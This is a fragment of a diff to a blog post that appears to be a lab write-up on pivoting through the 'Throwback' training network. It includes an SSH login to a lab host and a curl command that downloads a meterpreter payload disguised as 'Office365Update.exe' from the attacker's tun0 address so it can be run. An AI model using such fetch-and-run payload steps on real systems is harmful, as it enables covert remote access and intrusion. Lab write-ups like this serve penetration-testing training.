lolkatz/github-pages-with-jekyll/_posts/2021-03-11-pivoting-throwback-network.md

 ssh blairej@10.200.19.219
 ````

-Use curl to grab the payload and execute it to get a meterpreter session (remember the ip is the same as tun0 so it will be different for you)
+Use curl to grab our little "update" and execute it to get a meterpreter session (remember the ip is the same as tun0 so it will be different for you):

 ````
 curl 10.50.17.38:8000/Office365Update.exe --output Office365Update.exe